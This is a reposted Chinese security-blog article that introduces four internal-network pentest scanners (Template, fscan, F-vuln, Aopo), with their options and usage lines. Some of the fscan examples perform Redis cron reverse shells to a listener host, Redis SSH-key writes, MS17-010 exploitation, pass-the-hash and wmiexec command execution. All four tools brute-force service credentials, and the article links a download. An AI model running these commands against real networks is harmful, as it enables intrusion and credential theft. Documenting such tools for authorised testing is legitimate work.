【内网渗透】内网资产扫描工具Template、Fscan、F-vuln、Aopo

admin 2023年11月1日14:35:56评论100 views字数 4111阅读13分42秒阅读模式

Template - 启发式内网扫描

参数说明

❯ ./App-arm64darwin-noupx

_____ _ _
|_ _| | | | |
| | ___ _ __ ___ _ __ | | __ _| |_ ___
| |/ _ '_' _ | '_ | |/ _' | __/ _
| | __/ | | | | | |_) | | (_| | || __/
_/___|_| |_| |_| .__/|_|__,_|_____|
| | by 1n7erface
|_|
[=] Load Success
Usage of ./App-arm64darwin-noupx:
-bt int
BruteModule threadNum (default 200)
-c string
auto check 192 or 172 or 10
-eprint error log
-i string
IP address of the host you want to scan,for example: 192.168.11.11-255 or 192.168.1.1/24 or /22 /15...
-it int
InfoModule threadNum (default 200)
-nobrute
skip brute
-noping
skip icmp alive
-nopoc
skip poc
-o string
output file name (default "output.txt")
-onping
only ping
-p string
custom port example: 80,8088,1-3000
-pw string
Define a password dictionary for blasting
-t int
Timeout (default 4)
-us string
Define a user dictionary for blasting

[=] end...... bt参数说明

此参数期望接收一个数值类型,用于爆破模块开启的协程数量,默认的数量为200

c参数说明
此参数期望接收一个字符串,存在于"192、172、10"三个字符串之间,程序会自动的探测网段存活,并对其进行扫描。包括192的192.168.0.1-192.168.255.255、172的172.16.0.1-172.31.255.255、10的10.0.0.1-10.255.255.255.值得一提的是,网段探测存活的算法是从每一个c段选择1,255 以及期间的随机3个ip进行检测,如果一个存活将判定为网段存活.在一定几率下存在漏段的可能无法避免.(10段不建议使用,网段太大可能产生预期之外的错误).

e参数说明
此参数不接收任何值,打印期间的错误日志,用于排查扫描的问题.

i参数说明
此参数接收一个字符串,字符串用于声明要扫描的网段,例如192.168.11.11-255 or 192.168.1.1/24 or /22 /15... ,此参数支持CIDR的表达式.

it参数说明
此参数期望接收一个数值类型,用于信息探测模块开启的协程数量,例如ip存活、端口扫描、web指纹.

nobrute参数说明
此参数不接收任何值,不对信息探测的结果进行暴力破解模块.

noping参数说明
此参数不接收任何值,在目标网段不支持ICMP协议时,通过TCP进行探测.

nopoc参数说明
此参数不接收任何值,不对探测的WEB服务进行漏洞探测的模块.

o参数说明
此参数接收一个字符串,用于对结果保存的文件名称,默认为output.txt.

onping参数说明
此参数不接收任何值,对目标网段只进行ICMP的ip存活探测,其余一律不做.

p参数说明
此参数接收一个字符串,指定端口扫描的端口.例如,80,8088,1-3000 (注:此参数一经指定则不进行程序自带端口的扫描)

pw参数说明
此参数接收一个字符串,指定爆破的密码字典,例如 -pw ffnxjfl123,fgmgergn334 (注:此参数一经指定则不进行程序自带密码的扫描)

t参数说明
此参数期望接收一个数值类型,用于在漏洞扫描,WEB识别时的超时时间设置.

us参数说明
此参数期望接收一个字符串,指定爆破的用户名字典,例如 -us fwefwf,fwefwf (注:此参数一经指定则不进行程序自带用户名的扫描)

如果想指定端口、爆破的用户名和密码并且仍然使用程序自带的端口、密码、用户名进行扫描.可以在当前程序的同级目录上传名为"config.json"的文件
内容为: {"pass":["ffnxjfl123","fgmgergn334"],"user":["fwefwf","fwefwf"],"ports":[9999,8888]}

 

使用截图

【内网渗透】内网资产扫描工具Template、Fscan、F-vuln、Aopo
【内网渗透】内网资产扫描工具Template、Fscan、F-vuln、Aopo

fscan

简介

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

主要功能

1.信息搜集:
存活探测(icmp)
端口扫描
2.爆破功能:
各类服务爆破(ssh、smb、rdp等)
数据库密码爆破(mysql、mssql、redis、psql、oracle等)
3.系统信息、漏洞扫描:
netbios探测、域控识别
获取目标网卡信息
高危漏洞扫描(ms17010等)
4.Web探测功能:
webtitle探测
web指纹识别(常见cms、oa框架等)
web漏洞扫描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
redis写公钥或写计划任务
ssh命令执行
ms17017利用(植入shellcode),如添加用户等
6.其他功能:
文件保存

使用说明

简单用法

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/16  (B段扫描)

其他用法

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)

F-vuln

介绍

F-vuln(全称:Find-Vulnerability)是为了自己工作方便专门编写的一款自动化工具,主要适用于日常安全服务、渗透测试人员和RedTeam红队人员,它集合的功能包括:存活IP探测、开放端口探测、web服务探测、web漏洞扫描、smb爆破、ssh爆破、ftp爆破、mssql爆破等其他数据库爆破工作以及大量web漏洞检测模块。

工具使用

Fvuln.exe -s tomcat -u http://192.168.0.100/
查看程序版本:Fvuln.exe -v (如果你能直连github,即可获取程序最新版本号)
【内网渗透】内网资产扫描工具Template、Fscan、F-vuln、Aopo
查看现在能检测的漏洞模块:Fvuln.exe -l or Fvuln.exe --list
【内网渗透】内网资产扫描工具Template、Fscan、F-vuln、Aopo

Aopo

简介

内网自动化快速打点工具|资产探测|漏洞扫描|服务扫描|弱口令爆破
【内网渗透】内网资产扫描工具Template、Fscan、F-vuln、Aopo

功能

 ICMP并发探测存活IP
 对A段只进行网关探测
 集成Xray POC扫描
 解析Xray POC V1模版
 并发探测主机端口服务
 并发探测主机服务弱口令
 服务弱口令探测模块 支持 SSH
 服务弱口令探测模块 支持 Mysql
 服务弱口令探测模块 支持 Mssql
 服务弱口令探测模块 支持 Mongodb
 服务弱口令探测模块 支持 Oracle
 服务弱口令探测模块 支持 FTP
 服务弱口令探测模块 支持 SMB
 服务弱口令探测模块 支持 Redis 未授权
 自定义Password字典 自动合并到程序内置

下载链接

链接:https://pan.baidu.com/s/1uPObtl0oZxrSzGGomUPUaQ 提取码:vnik

 

原文始发于微信公众号(小C学安全):【内网渗透】内网资产扫描工具Template、Fscan、F-vuln、Aopo

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月1日14:35:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网渗透】内网资产扫描工具Template、Fscan、F-vuln、Aopohttp://cn-sec.com/archives/2165435.html

发表评论

匿名网友 填写信息